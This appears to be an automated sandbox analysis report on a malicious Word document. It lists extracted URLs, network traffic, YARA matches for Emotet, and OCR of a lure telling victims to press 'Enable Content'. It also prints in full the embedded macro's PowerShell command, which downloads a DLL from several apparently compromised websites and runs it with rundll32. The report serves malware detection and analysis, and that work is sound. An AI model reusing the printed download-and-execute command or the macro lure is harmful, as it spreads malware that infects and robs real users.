Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pesterp
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000003.312830879.000000000517B000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.windows.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.local
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://management.azure.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://management.azure.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://osi.office.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://roaming.edog.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: https://staviancjs.com/wp-forum/QOm4n2/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.309740186.000001C419413000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000002.309792794.000001C41943A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://tasks.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.dr	String found in binary or memory: https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/

Source: unknown

DNS traffic detected: queries for: thepilatesstudionj.com

Source: global traffic	HTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Nov 2021 10:03:15 GMTContent-Type: text/htmlContent-Length: 162Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A5A30 GetOpenClipboardWindow,CloseClipboard,GetMenuCheckMarkDimensions,IsSystemResumeAutomatic,

14_2_615A5A30

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type h
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for protected documents You have to press "ENABLE
Source: Screenshot number: 4	Screenshot OCR: protected documents You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms D
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese butt
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. C, Previewing is not available for protected documents. O You have to press
Source: Screenshot number: 8	Screenshot OCR: protected documents. O You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview t
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese buttons to quickly custo
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\13791789.dll

Jump to dropped file

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer)			Name: dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)

Document has an unknown application name

Source: 1711.doc	OLE indicator application name: unknown
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator application name: unknown
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE indicator application name: unknown

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046EE760	5_2_046EE760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046ECF60	5_2_046ECF60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046ECF70	5_2_046ECF70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A5730	14_2_615A5730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6620	14_2_615A6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA1F0	14_2_615BA1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D3074	14_2_615D3074
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA29D	14_2_615BA29D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615AF700	14_2_615AF700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615C3780	14_2_615C3780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA60F	14_2_615BA60F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615CC6FE	14_2_615CC6FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D1929	14_2_615D1929
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BA8B9	14_2_615BA8B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BAB80	14_2_615BAB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BDA2D	14_2_615BDA2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A2A80	14_2_615A2A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BDC5D	14_2_615BDC5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B7C47	14_2_615B7C47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B1CD0	14_2_615B1CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BAE3B	14_2_615BAE3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A5EE0	14_2_615A5EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067441E	16_2_0067441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068CAA8	16_2_0068CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006843B3	16_2_006843B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068406E	16_2_0068406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671C76	16_2_00671C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672A46	16_2_00672A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673845	16_2_00673845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672043	16_2_00672043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068E441	16_2_0068E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067A048	16_2_0067A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679A57	16_2_00679A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672654	16_2_00672654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067EC27	16_2_0067EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067D223	16_2_0067D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679E22	16_2_00679E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00685220	16_2_00685220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691A3C	16_2_00691A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068F83F	16_2_0068F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00674C00	16_2_00674C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671A0A	16_2_00671A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067220A	16_2_0067220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00678C09	16_2_00678C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067F41F	16_2_0067F41F
